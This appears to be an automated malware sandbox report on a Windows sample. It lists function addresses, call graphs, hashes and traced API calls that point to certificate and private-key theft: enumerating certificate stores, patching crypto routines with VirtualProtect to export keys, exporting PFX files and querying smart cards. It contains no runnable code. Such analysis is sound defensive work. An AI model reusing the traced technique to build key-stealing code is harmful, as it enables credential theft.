                                                                                                                                        • Opcode Fuzzy Hash: 7f12bac4f1dd78845df68974ec1d6207e79698338a7a17bde6cb34e1bb9e829b
                                                                                                                                        • Instruction Fuzzy Hash: 2B11CE3230A205EADB005AD9A941FBB32199B40754F3041B7B603B90F1953D8913BF2F
                                                                                                                                        Function 004019E0 Relevance: 1.3, APIs: 1, Instructions: 60sleepCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 486 4019e0-401a10 492 401a13-401a46 call 40127e Sleep call 4014fb 486->492 493 401a09-401a0c 486->493 501 401a55-401a5b 492->501 502 401a48-401a50 call 4015fb 492->502 493->492 505 401a60-401a65 501->505 506 401a69 501->506 502->501 507 401a6c-401a9a call 40127e 505->507 506->505 506->507
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                                          • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                          • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.2572905300.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_hdhruer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4152845823-0
                                                                                                                                        • Opcode ID: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
                                                                                                                                        • Instruction ID: 6e8e83dbc6cb5325300a6df4c81bf03677ed1736eef4dabc06710691df282c78
                                                                                                                                        • Opcode Fuzzy Hash: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
                                                                                                                                        • Instruction Fuzzy Hash: FA016D3230A209EADB005AD8AD41E7B3229AB40754F3001B7BA03790F1953D99137F2F
                                                                                                                                        Function 004019EB Relevance: 1.3, APIs: 1, Instructions: 54sleepCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 516 4019eb-401a10 520 401a13-401a46 call 40127e Sleep call 4014fb 516->520 521 401a09-401a0c 516->521 529 401a55-401a5b 520->529 530 401a48-401a50 call 4015fb 520->530 521->520 533 401a60-401a65 529->533 534 401a69 529->534 530->529 535 401a6c-401a9a call 40127e 533->535 534->533 534->535
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                                          • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                          • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.2572905300.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_hdhruer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4152845823-0
                                                                                                                                        • Opcode ID: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
                                                                                                                                        • Instruction ID: 2b2adc88e5ab551374836522510027b0c35959e32ac3f93f20a40eb2707c2e9b
                                                                                                                                        • Opcode Fuzzy Hash: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
                                                                                                                                        • Instruction Fuzzy Hash: C2014C3230A205EBDB009AD4ED41B6A3269AB44714F3041B7BA13B91F1D53D9A537F2B
                                                                                                                                        Function 00401A04 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 544 401a04-401a46 call 40127e Sleep call 4014fb 553 401a55-401a5b 544->553 554 401a48-401a50 call 4015fb 544->554 557 401a60-401a65 553->557 558 401a69 553->558 554->553 559 401a6c-401a9a call 40127e 557->559 558->557 558->559
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                                          • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                          • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.2572905300.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_hdhruer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4152845823-0
                                                                                                                                        • Opcode ID: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
                                                                                                                                        • Instruction ID: 8da435b4ef065fa937355dde1d01ef47451206c1f83fca999a74837282515cb4
                                                                                                                                        • Opcode Fuzzy Hash: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
                                                                                                                                        • Instruction Fuzzy Hash: 8B01363630A209EADB005AD8AD41EBA22559B44314F3042B7BA13B91F5D53D8A137F2F
                                                                                                                                        Function 004019FD Relevance: 1.3, APIs: 1, Instructions: 49sleepCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                                          • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                          • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.2572905300.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_hdhruer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4152845823-0
                                                                                                                                        • Opcode ID: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
                                                                                                                                        • Instruction ID: da9cf87a9ed9cba2a5618582a19ce6b128e8deecbf4ee8231104359b1f28a93a
                                                                                                                                        • Opcode Fuzzy Hash: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
                                                                                                                                        • Instruction Fuzzy Hash: 4601863230A209EADB005AD49D41FBA22199B44714F3041B7BA13B90F1D53D8A137F2F
                                                                                                                                        Function 004B205C Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 004B20AD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.2574353685.00000000004A0000.00000040.00000020.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_4a0000_hdhruer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                        • Instruction ID: 22139d9f4d49158939a70f65387c23ac1f1c2ecd23adf37a7f1e57fcb2dc7f71
                                                                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                        • Instruction Fuzzy Hash: 09113F79A00208EFDB01DF98CA85E99BBF5AF08350F058095FA489B361D375EA90DF94
                                                                                                                                        Function 00401A15 Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                                          • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                          • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.2572905300.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_hdhruer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4152845823-0
                                                                                                                                        • Opcode ID: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
                                                                                                                                        • Instruction ID: ef4a3633df93866afb86b86826f27a476d683f03040323dac8a7d7c578d0eba4
                                                                                                                                        • Opcode Fuzzy Hash: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
                                                                                                                                        • Instruction Fuzzy Hash: 17F04432309206EBDB01AAD4DD41FAA3229AB44354F3041B7BA13B90F1D53C86127F2B
                                                                                                                                        Function 00401A20 Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                                          • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                          • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.2572905300.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_hdhruer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4152845823-0
                                                                                                                                        • Opcode ID: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
                                                                                                                                        • Instruction ID: 08c596e776171f083f15ab2e9130eea247f108212a51f0ba4fb69116c36cf548
                                                                                                                                        • Opcode Fuzzy Hash: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
                                                                                                                                        • Instruction Fuzzy Hash: 4BF0FF3230A209EADB005AD59D51EAA26699B44354F3041B7BA13B90F1D53D8A137F2B

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:22.8%
                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                        Signature Coverage:5.9%
                                                                                                                                        Total number of Nodes:867
                                                                                                                                        Total number of Limit Nodes:43
                                                                                                                                        execution_graph 3952 7ff6f2d62b1c 3963 7ff6f2d61990 3952->3963 3954 7ff6f2d62b42 3967 7ff6f2d619e4 3954->3967 3956 7ff6f2d62b4d 3957 7ff6f2d61990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 3956->3957 3958 7ff6f2d62b5c 3957->3958 3959 7ff6f2d61990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 3958->3959 3960 7ff6f2d62b6b CertEnumSystemStore 3959->3960 3961 7ff6f2d61990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 3960->3961 3962 7ff6f2d62b94 3961->3962 3964 7ff6f2d619ad 3963->3964 3972 7ff6f2d61918 3964->3972 3966 7ff6f2d619ba 3966->3954 3982 7ff6f2d67dc8 3967->3982 3973 7ff6f2d61951 3972->3973 3974 7ff6f2d6192e 3972->3974 3973->3966 3974->3974 3976 7ff6f2d62654 3974->3976 3977 7ff6f2d62669 GetProcessHeap RtlReAllocateHeap 3976->3977 3978 7ff6f2d62682 3976->3978 3979 7ff6f2d6268a 3977->3979 3981 7ff6f2d625dc GetProcessHeap HeapAlloc 3978->3981 3979->3973 3983 7ff6f2d67de9 3982->3983 3986 7ff6f2d625dc GetProcessHeap HeapAlloc 3983->3986 4516 7ff6f2d6639c 4517 7ff6f2d663c7 4516->4517 4518 7ff6f2d67234 5 API calls 4517->4518 4519 7ff6f2d66449 4518->4519 4520 7ff6f2d67234 5 API calls 4519->4520 4521 7ff6f2d66468 4520->4521 4522 7ff6f2d67234 5 API calls 4521->4522 4523 7ff6f2d66487 4522->4523 4524 7ff6f2d67234 5 API calls 4523->4524 4525 7ff6f2d664ed 4524->4525 4526 7ff6f2d67234 5 API calls 4525->4526 4527 7ff6f2d6650c 4526->4527 4528 7ff6f2d67234 5 API calls 4527->4528 4529 7ff6f2d6652b 4528->4529 4554 7ff6f2d67298 4529->4554 4531 7ff6f2d6654a 4532 7ff6f2d67234 5 API calls 4531->4532 4533 7ff6f2d66569 4532->4533 4534 7ff6f2d67234 5 API calls 4533->4534 4535 7ff6f2d66588 4534->4535 4536 7ff6f2d67234 5 API calls 4535->4536 4537 7ff6f2d665f7 4536->4537 4538 7ff6f2d67234 5 API calls 4537->4538 4539 7ff6f2d66616 4538->4539 4559 7ff6f2d672d4 4539->4559 4541 7ff6f2d66635 4542 7ff6f2d672d4 5 API calls 4541->4542 4543 7ff6f2d66654 4542->4543 4544 7ff6f2d672d4 5 API calls 4543->4544 4545 7ff6f2d666b7 4544->4545 4546 7ff6f2d67234 5 API calls 4545->4546 4547 7ff6f2d666d6 4546->4547 4548 7ff6f2d67234 5 API calls 4547->4548 4549 7ff6f2d666f5 4548->4549 4550 7ff6f2d67234 5 API calls 4549->4550 4551 7ff6f2d66714 4550->4551 4552 7ff6f2d67234 5 API calls 4551->4552 4553 7ff6f2d66733 4552->4553 4555 7ff6f2d67310 5 API calls 4554->4555 4556 7ff6f2d672b5 4555->4556 4557 7ff6f2d672ce 4556->4557 4558 7ff6f2d61a70 5 API calls 4556->4558 4557->4531 4558->4557 4560 7ff6f2d67310 5 API calls 4559->4560 4561 7ff6f2d672f1 4560->4561 4562 7ff6f2d67309 4561->4562 4563 7ff6f2d61a70 5 API calls 4561->4563 4562->4541 4563->4562 4564 7ff6f2d66758 4565 7ff6f2d6677b 4564->4565 4565->4565 4566 7ff6f2d67234 5 API calls 4565->4566 4567 7ff6f2d667ea 4566->4567 4568 7ff6f2d67234 5 API calls 4567->4568 4569 7ff6f2d66859 4568->4569 4570 7ff6f2d67234 5 API calls 4569->4570 4571 7ff6f2d66878 4570->4571 4572 7ff6f2d67234 5 API calls 4571->4572 4573 7ff6f2d66897 4572->4573 4574 7ff6f2d67234 5 API calls 4573->4574 4575 7ff6f2d668b6 4574->4575 4576 7ff6f2d6e3ac lstrcpyW PathAppendW 4577 7ff6f2d6e423 4576->4577 4577->4577 4592 7ff6f2d6ccf8 RegGetValueW 4577->4592 4580 7ff6f2d6e4ba 4581 7ff6f2d61990 4 API calls 4582 7ff6f2d6e476 4581->4582 4583 7ff6f2d619e4 4 API calls 4582->4583 4584 7ff6f2d6e481 4583->4584 4585 7ff6f2d61990 4 API calls 4584->4585 4586 7ff6f2d6e490 4585->4586 4587 7ff6f2d619e4 4 API calls 4586->4587 4588 7ff6f2d6e49f 4587->4588 4589 7ff6f2d61990 4 API calls 4588->4589 4590 7ff6f2d6e4ae 4589->4590 4591 7ff6f2d625b4 2 API calls 4590->4591 4591->4580 4593 7ff6f2d6cd80 4592->4593 4594 7ff6f2d6cd41 4592->4594 4593->4580 4593->4581 4599 7ff6f2d62588 GetProcessHeap HeapAlloc 4594->4599 3987 7ff6f2d62bac 3988 7ff6f2d62bc5 3987->3988 3989 7ff6f2d61990 4 API calls 3988->3989 3990 7ff6f2d62bdc 3989->3990 3991 7ff6f2d619e4 4 API calls 3990->3991 3992 7ff6f2d62bec 3991->3992 3993 7ff6f2d61990 4 API calls 3992->3993 3994 7ff6f2d62c00 CertOpenStore 3993->3994 3995 7ff6f2d62c24 3994->3995 3996 7ff6f2d62c48 3994->3996 3997 7ff6f2d61990 4 API calls 3995->3997 4000 7ff6f2d61990 4 API calls 3996->4000 3998 7ff6f2d62c38 3997->3998 4002 7ff6f2d62d5c CertEnumCertificatesInStore 3998->4002 4001 7ff6f2d62cbd CertCloseStore 4000->4001 4003 7ff6f2d6319c 4002->4003 4009 7ff6f2d62daa 4002->4009 4004 7ff6f2d631ad 4003->4004 4006 7ff6f2d625b4 2 API calls 4003->4006 4004->3996 4005 7ff6f2d62db0 CertGetNameStringW 4005->4009 4006->4004 4007 7ff6f2d61990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4007->4009 4008 7ff6f2d619e4 4 API calls 4008->4009 4009->4005 4009->4007 4009->4008 4010 7ff6f2d61990 4 API calls 4009->4010 4011 7ff6f2d62e8e CertNameToStrW 4010->4011 4013 7ff6f2d62eca 4011->4013 4012 7ff6f2d61990 4 API calls 4012->4013 4013->4012 4014 7ff6f2d619e4 4 API calls 4013->4014 4015 7ff6f2d61990 4 API calls 4013->4015 4014->4013 4016 7ff6f2d62eec CertNameToStrW 4015->4016 4018 7ff6f2d62f1c 4016->4018 4017 7ff6f2d61990 4 API calls 4017->4018 4018->4017 4019 7ff6f2d619e4 4 API calls 4018->4019 4020 7ff6f2d61990 4 API calls 4018->4020 4019->4018 4021 7ff6f2d62f3e FileTimeToSystemTime 4020->4021 4022 7ff6f2d62f84 4021->4022 4037 7ff6f2d61a70 4022->4037 4024 7ff6f2d62faf FileTimeToSystemTime 4028 7ff6f2d62ffa 4024->4028 4025 7ff6f2d61a70 wvsprintfW GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4025->4028 4028->4025 4029 7ff6f2d61990 4 API calls 4028->4029 4035 7ff6f2d6308d 4028->4035 4040 7ff6f2d679f0 4028->4040 4044 7ff6f2d625b4 4028->4044 4031 7ff6f2d6316e CertEnumCertificatesInStore 4029->4031 4031->4003 4031->4005 4033 7ff6f2d625b4 2 API calls 4033->4035 4034 7ff6f2d61990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4034->4035 4035->4028 4035->4033 4035->4034 4036 7ff6f2d625b4 2 API calls 4035->4036 4047 7ff6f2d63220 CertGetCertificateContextProperty 4035->4047 4074 7ff6f2d6a778 4035->4074 4036->4028 4038 7ff6f2d61918 4 API calls 4037->4038 4039 7ff6f2d61a96 wvsprintfW 4038->4039 4039->4024 4041 7ff6f2d67a0d 4040->4041 4042 7ff6f2d67a09 4040->4042 4078 7ff6f2d625dc GetProcessHeap HeapAlloc 4041->4078 4042->4028 4045 7ff6f2d625da 4044->4045 4046 7ff6f2d625b9 GetProcessHeap RtlFreeHeap 4044->4046 4045->4028 4046->4045 4048 7ff6f2d6348c 4047->4048 4049 7ff6f2d6326c CryptAcquireCertificatePrivateKey 4047->4049 4048->4035 4049->4048 4050 7ff6f2d6329b 4049->4050 4051 7ff6f2d634a9 OpenSCManagerA 4050->4051 4052 7ff6f2d632b4 CryptGetUserKey 4050->4052 4053 7ff6f2d634dd 4051->4053 4052->4048 4054 7ff6f2d632c9 4052->4054 4056 7ff6f2d634fb 6 API calls 4053->4056 4079 7ff6f2d636f0 4054->4079 4057 7ff6f2d635d1 4056->4057 4089 7ff6f2d625dc GetProcessHeap HeapAlloc 4057->4089 4058 7ff6f2d632e5 4058->4048 4060 7ff6f2d63333 LoadLibraryA 4058->4060 4062 7ff6f2d6335f 4060->4062 4063 7ff6f2d6337a GetProcAddress VirtualProtect 4062->4063 4066 7ff6f2d633c1 4063->4066 4064 7ff6f2d6361d 4065 7ff6f2d63652 CertOpenStore CertAddCertificateLinkToStore CertSetCertificateContextProperty PFXExportCertStoreEx 4064->4065 4090 7ff6f2d625dc GetProcessHeap HeapAlloc 4065->4090 4069 7ff6f2d633d0 VirtualProtect CryptExportKey 4066->4069 4069->4048 4070 7ff6f2d6340e VirtualProtect 4069->4070 4087 7ff6f2d6262c 4070->4087 4073 7ff6f2d63463 CryptImportKey 4073->4048 4073->4064 4075 7ff6f2d6a7a0 4074->4075 4092 7ff6f2d625dc GetProcessHeap HeapAlloc 4075->4092 4080 7ff6f2d63728 CryptExportKey 4079->4080 4081 7ff6f2d6370f 4079->4081 4082 7ff6f2d637ac 4080->4082 4084 7ff6f2d6374e 4080->4084 4081->4080 4091 7ff6f2d625dc GetProcessHeap HeapAlloc 4082->4091 4085 7ff6f2d637a8 4084->4085 4086 7ff6f2d63766 CryptExportKey 4084->4086 4085->4058 4086->4082 4086->4085 4088 7ff6f2d62634 VirtualProtect CryptAcquireContextA 4087->4088 4088->4048 4088->4073 4600 7ff6f2d669ec 4601 7ff6f2d66a0f 4600->4601 4601->4601 4602 7ff6f2d67234 5 API calls 4601->4602 4603 7ff6f2d66a7e 4602->4603 4604 7ff6f2d67234 5 API calls 4603->4604 4605 7ff6f2d66aed 4604->4605 4606 7ff6f2d672d4 5 API calls 4605->4606 4607 7ff6f2d66b0c 4606->4607 4608 7ff6f2d65fac 4609 7ff6f2d65fc2 4608->4609 4610 7ff6f2d67234 5 API calls 4609->4610 4611 7ff6f2d65ff0 4610->4611 4612 7ff6f2d6b428 4613 7ff6f2d6b44b 4612->4613 4614 7ff6f2d61990 4 API calls 4613->4614 4615 7ff6f2d6b456 4614->4615 4616 7ff6f2d61990 4 API calls 4615->4616 4617 7ff6f2d6b465 4616->4617 4618 7ff6f2d6b889 4617->4618 4619 7ff6f2d6b486 4617->4619 4620 7ff6f2d61990 4 API calls 4618->4620 4621 7ff6f2d6b736 4619->4621 4622 7ff6f2d6b4af 4619->4622 4623 7ff6f2d6b89d 4620->4623 4624 7ff6f2d61990 4 API calls 4621->4624 4625 7ff6f2d61990 4 API calls 4622->4625 4627 7ff6f2d61990 4 API calls 4623->4627 4626 7ff6f2d6b746 4624->4626 4644 7ff6f2d6b4bf 4625->4644 4631 7ff6f2d61990 4 API calls 4626->4631 4628 7ff6f2d6b8b1 4627->4628 4629 7ff6f2d61a70 5 API calls 4628->4629 4659 7ff6f2d6b887 4629->4659 4630 7ff6f2d6b725 4632 7ff6f2d61990 4 API calls 4630->4632 4633 7ff6f2d6b75a 4631->4633 4637 7ff6f2d6b734 4632->4637 4635 7ff6f2d61a70 5 API calls 4633->4635 4634 7ff6f2d61990 4 API calls 4636 7ff6f2d6b8d2 4634->4636 4635->4637 4638 7ff6f2d61990 4 API calls 4637->4638 4639 7ff6f2d6b780 SCardListCardsW 4638->4639 4641 7ff6f2d6b7b9 4639->4641 4642 7ff6f2d6b842 4639->4642 4640 7ff6f2d619e4 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4640->4644 4643 7ff6f2d61990 4 API calls 4641->4643 4645 7ff6f2d61990 4 API calls 4642->4645 4650 7ff6f2d6b7c9 4643->4650 4644->4630 4644->4640 4647 7ff6f2d6b52b SCardGetStatusChangeW 4644->4647 4660 7ff6f2d61a70 wvsprintfW GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4644->4660 4661 7ff6f2d6b5bf SCardListCardsW 4644->4661 4662 7ff6f2d61990 4 API calls 4644->4662 4663 7ff6f2d61990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4644->4663 4646 7ff6f2d6b852 4645->4646 4651 7ff6f2d61990 4 API calls 4646->4651 4647->4644 4648 7ff6f2d6b824 4649 7ff6f2d61990 4 API calls 4648->4649 4652 7ff6f2d6b833 SCardFreeMemory 4649->4652 4650->4648 4653 7ff6f2d61990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4650->4653 4657 7ff6f2d619e4 4 API calls 4650->4657 4654 7ff6f2d6b866 4651->4654 4655 7ff6f2d6b878 4652->4655 4653->4650 4656 7ff6f2d61a70 5 API calls 4654->4656 4658 7ff6f2d61990 4 API calls 4655->4658 4656->4655 4657->4650 4658->4659 4659->4634 4660->4644 4661->4644 4664 7ff6f2d6b676 SCardFreeMemory 4662->4664 4663->4644 4664->4644 4489 7ff6f2d61968 4492 7ff6f2d625dc GetProcessHeap HeapAlloc 4489->4492 4678 7ff6f2d66d30 4679 7ff6f2d66d51 4678->4679 4680 7ff6f2d67234 5 API calls 4679->4680 4681 7ff6f2d66dc0 4680->4681 4682 7ff6f2d67234 5 API calls 4681->4682 4683 7ff6f2d66e2d 4682->4683 4684 7ff6f2d672d4 5 API calls 4683->4684 4685 7ff6f2d66e4c 4684->4685 4694 7ff6f2d671ec 4685->4694 4687 7ff6f2d66e6b 4688 7ff6f2d671ec 5 API calls 4687->4688 4689 7ff6f2d66edd 4688->4689 4690 7ff6f2d67234 5 API calls 4689->4690 4691 7ff6f2d66f42 4690->4691 4692 7ff6f2d67234 5 API calls 4691->4692 4693 7ff6f2d66fa0 4692->4693 4695 7ff6f2d67310 5 API calls 4694->4695 4696 7ff6f2d67209 4695->4696 4697 7ff6f2d6722e 4696->4697 4698 7ff6f2d61990 4 API calls 4696->4698 4697->4687 4698->4697 4699 7ff6f2d66270 4700 7ff6f2d66293 4699->4700 4701 7ff6f2d67234 5 API calls 4700->4701 4702 7ff6f2d66302 4701->4702 4703 7ff6f2d67234 5 API calls 4702->4703 4704 7ff6f2d66321 4703->4704 4705 7ff6f2d67234 5 API calls 4704->4705 4706 7ff6f2d66340 4705->4706 4707 7ff6f2d67234 5 API calls 4706->4707 4708 7ff6f2d6635f 4707->4708 4709 7ff6f2d67234 5 API calls 4708->4709 4710 7ff6f2d6637e 4709->4710 4711 7ff6f2d6c37c 4712 7ff6f2d6c38f 4711->4712 4713 7ff6f2d61990 4 API calls 4712->4713 4714 7ff6f2d6c39a 4713->4714 4729 7ff6f2d6c548 4714->4729 4813 7ff6f2d6e944 4729->4813 4834 7ff6f2d625dc GetProcessHeap HeapAlloc 4813->4834 4922 7ff6f2d6ecbc 4923 7ff6f2d6ecea 4922->4923 4925 7ff6f2d6ee07 4922->4925 4923->4925 4936 7ff6f2d625dc GetProcessHeap HeapAlloc 4923->4936 4093 7ff6f2d673fc 4094 7ff6f2d6743f 4093->4094 4095 7ff6f2d61990 4 API calls 4094->4095 4096 7ff6f2d6746e 4095->4096 4097 7ff6f2d61a70 5 API calls 4096->4097 4098 7ff6f2d67490 4097->4098 4099 7ff6f2d61a70 5 API calls 4098->4099 4100 7ff6f2d674a4 4099->4100 4141 7ff6f2d678ec 4100->4141 4103 7ff6f2d61990 4 API calls 4104 7ff6f2d674c5 4103->4104 4105 7ff6f2d61a70 5 API calls 4104->4105 4106 7ff6f2d674d9 4105->4106 4147 7ff6f2d679c4 GetNativeSystemInfo 4106->4147 4109 7ff6f2d61990 4 API calls 4110 7ff6f2d674fa 4109->4110 4149 7ff6f2d67138 CoInitializeEx CoInitializeSecurity CoCreateInstance 4110->4149 4112 7ff6f2d67503 4117 7ff6f2d675d1 4112->4117 4150 7ff6f2d6785c 4112->4150 4113 7ff6f2d6783c 4161 7ff6f2d67104 4113->4161 4117->4113 4118 7ff6f2d6785c 5 API calls 4117->4118 4121 7ff6f2d67629 4118->4121 4119 7ff6f2d6755b 4120 7ff6f2d6785c 5 API calls 4119->4120 4123 7ff6f2d67596 4120->4123 4122 7ff6f2d6785c 5 API calls 4121->4122 4125 7ff6f2d67664 4122->4125 4124 7ff6f2d6785c 5 API calls 4123->4124 4124->4117 4126 7ff6f2d6785c 5 API calls 4125->4126 4127 7ff6f2d6769f 4126->4127 4128 7ff6f2d6785c 5 API calls 4127->4128 4129 7ff6f2d676da 4128->4129 4130 7ff6f2d6785c 5 API calls 4129->4130 4131 7ff6f2d67715 4130->4131 4132 7ff6f2d6785c 5 API calls 4131->4132 4133 7ff6f2d67750 4132->4133 4134 7ff6f2d6785c 5 API calls 4133->4134 4135 7ff6f2d6778b 4134->4135 4136 7ff6f2d6785c 5 API calls 4135->4136 4137 7ff6f2d677c6 4136->4137 4138 7ff6f2d6785c 5 API calls 4137->4138 4139 7ff6f2d67801 4138->4139 4140 7ff6f2d6785c 5 API calls 4139->4140 4140->4113 4142 7ff6f2d67918 4141->4142 4143 7ff6f2d67977 LoadLibraryA GetProcAddress 4142->4143 4144 7ff6f2d674a9 4143->4144 4145 7ff6f2d67991 GetCurrentProcess IsWow64Process 4143->4145 4144->4103 4145->4144 4146 7ff6f2d679ad 4145->4146 4146->4144 4148 7ff6f2d674de 4147->4148 4148->4109 4149->4112 4151 7ff6f2d61990 4 API calls 